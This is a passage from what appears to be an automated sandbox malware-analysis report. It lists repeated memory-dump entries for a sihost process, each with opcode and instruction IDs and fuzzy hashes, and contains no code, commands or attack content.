                                      • Opcode Fuzzy Hash: 5853fe735f975f07f126f2ba39c7102414fe2192a9a30960f1d9c2df6514cf26
                                      • Instruction Fuzzy Hash: 1FD1D578E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF40
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3aa225a4c7661c6a8fa2863b38fed770778a30fe5cbfc2c46ee8eac18699104d
                                      • Instruction ID: efcc947de5be1d40f88b1540f86e82233c86d705140ab47b0ed42e9b425c52e6
                                      • Opcode Fuzzy Hash: 3aa225a4c7661c6a8fa2863b38fed770778a30fe5cbfc2c46ee8eac18699104d
                                      • Instruction Fuzzy Hash: BAD1D378E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7dd6ac8a5bb5874aee9ee96ce5c4ee309342ee1ceed40d01d93fbccc2022a857
                                      • Instruction ID: 56f0f5e068a8e99ca34308858dd86aa971f7d75e262bfe2eda73e2d125b4e765
                                      • Opcode Fuzzy Hash: 7dd6ac8a5bb5874aee9ee96ce5c4ee309342ee1ceed40d01d93fbccc2022a857
                                      • Instruction Fuzzy Hash: A3D1C278E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38fc156ca90872dbcc2a392b47e1d16cb562c3731f0a188587b55636f49494f2
                                      • Instruction ID: 711c3b5689fbf9c5f141ea9e758ea79b892ef2fd283b62d6f8542c9d74d27669
                                      • Opcode Fuzzy Hash: 38fc156ca90872dbcc2a392b47e1d16cb562c3731f0a188587b55636f49494f2
                                      • Instruction Fuzzy Hash: 15D1D278E00218CFDB54DFA5C954BADBBB2BF89300F2481A9D809AB359DB355E81CF40
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3dd004a9afae658260d99011f0e9fc7a4bf568b71e89a7d1302aa46462d36f04
                                      • Instruction ID: 95b6d65118cd1d663e2412f49e68affc52fedea2203593db6643ebfa9983e939
                                      • Opcode Fuzzy Hash: 3dd004a9afae658260d99011f0e9fc7a4bf568b71e89a7d1302aa46462d36f04
                                      • Instruction Fuzzy Hash: 27D1C378E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355D81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b1ce83260536f07158948590175bdbf59b5a28255998d02f94a0e88123b8c2c
                                      • Instruction ID: 5e321b71188e4552b642e66339ae12f6f3b69360c956ac4956acb8d5b751f63f
                                      • Opcode Fuzzy Hash: 3b1ce83260536f07158948590175bdbf59b5a28255998d02f94a0e88123b8c2c
                                      • Instruction Fuzzy Hash: 23D1C378E00218CFDB54DFA5C950BADBBB2BF89300F2491A9D809AB359DB355E81CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3331afd97abfd5b713a0f8b5f7d00fd32dc7741b4817b0ff84a09537f050510
                                      • Instruction ID: 65a1153a22ba055526efafc8e5731b38203e2c99e446499b3593658cf2cc75cb
                                      • Opcode Fuzzy Hash: d3331afd97abfd5b713a0f8b5f7d00fd32dc7741b4817b0ff84a09537f050510
                                      • Instruction Fuzzy Hash: EFD1C378E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ea07ab79cb080cafa372fba2d4972f81fef920a70ad74b68e66c726c85a4763
                                      • Instruction ID: d87651e88dd05f9cdaa9d431655a33c228ac4b24efa9898316569d25a44a73e3
                                      • Opcode Fuzzy Hash: 1ea07ab79cb080cafa372fba2d4972f81fef920a70ad74b68e66c726c85a4763
                                      • Instruction Fuzzy Hash: ABD1C378E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bff3916324373b8845b6e3e65e9b2887d49c3e7d3085e640c7d3ec7057c82d04
                                      • Instruction ID: 6fb439b4f4e6f0e239cda3a4e3e1803fce1766f1e32c926f6560c135fca9f9a4
                                      • Opcode Fuzzy Hash: bff3916324373b8845b6e3e65e9b2887d49c3e7d3085e640c7d3ec7057c82d04
                                      • Instruction Fuzzy Hash: 23D1C378E00218CFDB54DFA5C950BADBBB2BF89300F2491A9D809AB359DB355E81CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 980ed8ca5521f56e41bcc397133103cef58f0cbf33f57197e61ca6068ddfc26f
                                      • Instruction ID: e44dbcb4e95f4ca186b7edfdf3172f540dcfb5709f0fc3865ba0559e4d6a190c
                                      • Opcode Fuzzy Hash: 980ed8ca5521f56e41bcc397133103cef58f0cbf33f57197e61ca6068ddfc26f
                                      • Instruction Fuzzy Hash: 2DD1C378E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d0984e4d46aa2ccda6c961c14f7559e778e400f1b5443e5256b093b907e52804
                                      • Instruction ID: 3da4dbdcb85a002f25be877fc7a4857e67f3c3176ffde126d6fe8e8dc244808e
                                      • Opcode Fuzzy Hash: d0984e4d46aa2ccda6c961c14f7559e778e400f1b5443e5256b093b907e52804
                                      • Instruction Fuzzy Hash: FFD1C374E002188FDB55DFA5C954BADBBB2BF89300F2481AAD809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd1e92359d2ae44ee4e02ff758d3f19eadc441153009fd3bb0ee21c2c22e7204
                                      • Instruction ID: c942e9f12f549fde8364eff5ca31c601ef5f21bb18a3dffece7d720119e0cca6
                                      • Opcode Fuzzy Hash: bd1e92359d2ae44ee4e02ff758d3f19eadc441153009fd3bb0ee21c2c22e7204
                                      • Instruction Fuzzy Hash: ADD1C378E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ef157031ba9badbcc7e00dcf3df192ff5054ee25975c67a0e2b0eb20dcb360c5
                                      • Instruction ID: 50eace6591b2604c31ffb6d8226cc416d6898dcd34154ef6626ba2ed17206860
                                      • Opcode Fuzzy Hash: ef157031ba9badbcc7e00dcf3df192ff5054ee25975c67a0e2b0eb20dcb360c5
                                      • Instruction Fuzzy Hash: 1AD1C274E002188FDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c3a0ab95019d14509c0d29b8aa100941fdb87a0c6631a73a7c9f32ca911e2ca
                                      • Instruction ID: 65d664ff60056ab5340672b5b51a5d637b7a3ce1690f1e55bb135eb18ec8cfc2
                                      • Opcode Fuzzy Hash: 4c3a0ab95019d14509c0d29b8aa100941fdb87a0c6631a73a7c9f32ca911e2ca
                                      • Instruction Fuzzy Hash: 45D1D378E00218CFDB54DFA5C954BADBBB2BF89300F2481A9D808AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aba2d042ad9432a5a3977c91b5f5d1cffaca0ae854f89f2e53712ab177b5cdf2
                                      • Instruction ID: 6b8d3cb95798eda4e8c854aa4d473761e1f0a6343388846b7b9e2b31d820d405
                                      • Opcode Fuzzy Hash: aba2d042ad9432a5a3977c91b5f5d1cffaca0ae854f89f2e53712ab177b5cdf2
                                      • Instruction Fuzzy Hash: 3DD1C278E00218CFDB54DFA5C954BADBBB2BF89300F2481A9D809AB359DB355E81CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a0e9a4f82379e6d4a4b15a3f02b8e480c073b8555e34ba3747d434dcc43ea61
                                      • Instruction ID: 85eee6cfaed2bdb4d1444e7d95fe6812c3adc4df6a3cca3235f66e9f4f589236
                                      • Opcode Fuzzy Hash: 1a0e9a4f82379e6d4a4b15a3f02b8e480c073b8555e34ba3747d434dcc43ea61
                                      • Instruction Fuzzy Hash: C7D1C378E00218CFDB54DFA5C994BADBBB2BF89300F2491A9D809AB359DB355D81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b1ce83260536f07158948590175bdbf59b5a28255998d02f94a0e88123b8c2c
                                      • Instruction ID: a87de0ca166e8fbc6f68d75db7ef17a35787e0b2de4c607723cce8d893a961ab
                                      • Opcode Fuzzy Hash: 3b1ce83260536f07158948590175bdbf59b5a28255998d02f94a0e88123b8c2c
                                      • Instruction Fuzzy Hash: 68D1C378E00218CFDB54DFA5C950BADBBB2BF89300F2491A9D809AB359DB355E81CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e86ee201690b29c13eb70c4d777ce01db0f332667fee28e1f586a439206d888
                                      • Instruction ID: 0455d05ebbe1fd30f1d09fa8b469e6dd31cc27403e2ee5d5a8a1b4002f6b6865
                                      • Opcode Fuzzy Hash: 2e86ee201690b29c13eb70c4d777ce01db0f332667fee28e1f586a439206d888
                                      • Instruction Fuzzy Hash: 7FD1C374E00218CFDB54DFA5C954BADBBB2BF89300F2491AAD809AB359DB355D81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8d8bcb170e8b2bde55718d29ad5a2f0634306c284d7000e2e009a80484d3cf2
                                      • Instruction ID: a6917de6b13776c82ceda686fae67e629c17af14cfbe666c6ea9421f153ecf88
                                      • Opcode Fuzzy Hash: f8d8bcb170e8b2bde55718d29ad5a2f0634306c284d7000e2e009a80484d3cf2
                                      • Instruction Fuzzy Hash: FED1C278E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 417c239456250a825d30ae05b8a649bf3119c9472e42d1d87396275709791b41
                                      • Instruction ID: dc403e3e4652e1daeba36bd98128efd1a7e95a827db6286d3a145ecb6bdd0fe6
                                      • Opcode Fuzzy Hash: 417c239456250a825d30ae05b8a649bf3119c9472e42d1d87396275709791b41
                                      • Instruction Fuzzy Hash: 19D1C474E00218CFDB54DFA5C994BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 438baccbda7bab05ee5407bdb969a095993682d302c318aa71a0d529b25b0353
                                      • Instruction ID: 95995a45bcbc37f13509a2d52a47b39516e0f69a59fb6c6ac236572f3815ae35
                                      • Opcode Fuzzy Hash: 438baccbda7bab05ee5407bdb969a095993682d302c318aa71a0d529b25b0353
                                      • Instruction Fuzzy Hash: 56D1C478E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355D81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3d6eecaf93ff69f78e4f359e68c90e1dc807f5050c9984c0f602a40573f0f85
                                      • Instruction ID: f0c80045b752e37f48ce772ff9e5a0bc17e9e077989ec0e0145e5968a3fa70a3
                                      • Opcode Fuzzy Hash: b3d6eecaf93ff69f78e4f359e68c90e1dc807f5050c9984c0f602a40573f0f85
                                      • Instruction Fuzzy Hash: 70D1C378E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a276085e2700fc810e86e4dc7cbf5e621c0dd45cf99c99f4d3cee877d028f67
                                      • Instruction ID: c408f8fe08f88aabe0cd5dcb1932ffa6e9aa8f9d533692fe5641c19e93e2f888
                                      • Opcode Fuzzy Hash: 6a276085e2700fc810e86e4dc7cbf5e621c0dd45cf99c99f4d3cee877d028f67
                                      • Instruction Fuzzy Hash: ECD1C374E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 97d7052eec5269d8482cfb2cf07d4920e7ac7f8135c9ae5761d413fd7e495368
                                      • Instruction ID: ffc959f2a51317a5c2fdee011af18ad7f26bda2a4a2c8fb56da079d5579a5128
                                      • Opcode Fuzzy Hash: 97d7052eec5269d8482cfb2cf07d4920e7ac7f8135c9ae5761d413fd7e495368
                                      • Instruction Fuzzy Hash: B3D1C378E00218CFDB54DFA5C954BADBBB2BF89300F2491AAD809AB359DB355D81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 44b01fd68851e69afe0632a834eff8df4e196de59fd96669e8e804130daedea2
                                      • Instruction ID: c5cadc4f8a4573983713af42c9a57ac1bd02e4cb8c2315be8bae0b4ccb1776e0
                                      • Opcode Fuzzy Hash: 44b01fd68851e69afe0632a834eff8df4e196de59fd96669e8e804130daedea2
                                      • Instruction Fuzzy Hash: 03D1D374E00218CFDB55DFA5C950BADBBB2BF89300F2491A9D809AB359DB355E81CF40
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 9dacad3c696db987e7ebd58393f82925d469854ad98f572a56dd3c13632c9e8c
                                      • Instruction ID: c7d3b0d4886c24302c9abf1010640073eebf6dac28a8b783280a057c6d1b7e58
                                      • Opcode Fuzzy Hash: 9dacad3c696db987e7ebd58393f82925d469854ad98f572a56dd3c13632c9e8c
                                      • Instruction Fuzzy Hash: 52C1D574E01218CFDB54DFA5C994BADBBB2BF89300F2085AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 5e0c63a2ed4c355f9fa9062e828b912be55a194683fac0c4fa9c7e7b68719705
                                      • Instruction ID: d1119b3c74a0696d830364086d81aa49a150cfcf98a53cb8d8905833642dad3a
                                      • Opcode Fuzzy Hash: 5e0c63a2ed4c355f9fa9062e828b912be55a194683fac0c4fa9c7e7b68719705
                                      • Instruction Fuzzy Hash: 7EC1D574E00218CFDB14DFA5C954BADBBB2BF89300F2094A9D809AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: cde6dfa70aecd473738fa5fc5274c26543495cea904fbbb4d2b0f3e0ca0a0b34
                                      • Instruction ID: a711246cb6c07e7b0a9889bbdbcabb8cf613769e64aaf96375eb2703ffd8d6ec
                                      • Opcode Fuzzy Hash: cde6dfa70aecd473738fa5fc5274c26543495cea904fbbb4d2b0f3e0ca0a0b34
                                      • Instruction Fuzzy Hash: 06C1D674E00218CFDB54DFA5C854BADBBB2BF89300F2495A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 53fce5385e5d75145a899a6c695cc7ce7a7e2e605e8c14b5cdda04a2b05332b2
                                      • Instruction ID: b0b8ea994aeb6507778a76c3ace436efd44406b2e2a7500974ae63defc8710e7
                                      • Opcode Fuzzy Hash: 53fce5385e5d75145a899a6c695cc7ce7a7e2e605e8c14b5cdda04a2b05332b2
                                      • Instruction Fuzzy Hash: 35C1E674E01218CFDB14DFA5C994BADBBB2BF89300F2095A9D409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: d14ed2f16934029f2051f0cd944db53bb7f4963fe623fa705f717929c2b6356b
                                      • Instruction ID: 3184ebbf0c98b76fe894a93cc88bfc0790393a5503cbf4102ee7308d42245a47
                                      • Opcode Fuzzy Hash: d14ed2f16934029f2051f0cd944db53bb7f4963fe623fa705f717929c2b6356b
                                      • Instruction Fuzzy Hash: C2C1D574E00218CFDB54DFA5C954BADBBB2BF89300F2095AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: d63b0c465aafafbcada4e5917c0a13cde5cdd2eb950824f1369e066807a5f0bd
                                      • Instruction ID: 3a318566c3212db00cd2ae1f841dd2596d4d20491c35bab4695e36a0dff2a935
                                      • Opcode Fuzzy Hash: d63b0c465aafafbcada4e5917c0a13cde5cdd2eb950824f1369e066807a5f0bd
                                      • Instruction Fuzzy Hash: C0C1E674E00218CFDB14DFA5C854BADBBB2BF89300F2495AAD409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0dd497588ec04182720d01e122c98385838586631584d8e99452aa1ea7f8803c
                                      • Instruction ID: 676c9a5100f48317b3d1306eb4b3c1b4f2c078412e989123b032e73ed9b2c9bb
                                      • Opcode Fuzzy Hash: 0dd497588ec04182720d01e122c98385838586631584d8e99452aa1ea7f8803c
                                      • Instruction Fuzzy Hash: 90C1E574E00218CFDB54DFA5C994BADBBB2BF89300F2094A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 2ca861a03ab8cf2b653db41944db9f069db42276bea31595b754dc866abb975e
                                      • Instruction ID: 5db8f8c5488821bb7384b434a561fe5ed4e3895a68c40bdcc227a9563fd4800a
                                      • Opcode Fuzzy Hash: 2ca861a03ab8cf2b653db41944db9f069db42276bea31595b754dc866abb975e
                                      • Instruction Fuzzy Hash: B0C1D574E01218CFDB54DFA5C894BADBBB2BF89300F2095AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 130a8b9c260e1ac08db33bde9569616b31759175730d1c0af069224fb26b153f
                                      • Instruction ID: c3d6efe70d3d0f2c23a57d1d2c747ec0bee77e7f6697458e8d1392f8103453cb
                                      • Opcode Fuzzy Hash: 130a8b9c260e1ac08db33bde9569616b31759175730d1c0af069224fb26b153f
                                      • Instruction Fuzzy Hash: 0EC1C374E01218CFDB54DFA5C994BADBBB2BF89300F2085A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0b48e18c095c0c6f60a5b5606b12cf95ad9a00b10209abbb3b28c937496df15f
                                      • Instruction ID: b293b0742d6b6ca2d38a2a9743f2b76c66b08afa11066e7b812fbceffcd7cf86
                                      • Opcode Fuzzy Hash: 0b48e18c095c0c6f60a5b5606b12cf95ad9a00b10209abbb3b28c937496df15f
                                      • Instruction Fuzzy Hash: D3C1E674E00218CFDB14DFA5C854BADBBB2BF89300F2081A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 946b5a24e69b28edd5bae7fdf634bfb08509d5f38e326850c027bdb71499655e
                                      • Instruction ID: 845a214b06518450d8c93a9222c0829e382f2cb41a25075ed0d256d62a69eb17
                                      • Opcode Fuzzy Hash: 946b5a24e69b28edd5bae7fdf634bfb08509d5f38e326850c027bdb71499655e
                                      • Instruction Fuzzy Hash: DEC1D574E00218CFDB54DFA5C954BADBBB2BF89300F2095A9D809AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: a4d4a07da959ba88cefd28cdaf908990641bf3a5f9cfac7f34fd76830d4afc24
                                      • Instruction ID: 18026e6bfb5fb452dfee58137bdee2feade0c3f6a4690abc9a564f77dc0d36c9
                                      • Opcode Fuzzy Hash: a4d4a07da959ba88cefd28cdaf908990641bf3a5f9cfac7f34fd76830d4afc24
                                      • Instruction Fuzzy Hash: E3C1E574E00218CFDB14DFA5C954BADBBB2BF89300F2094A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
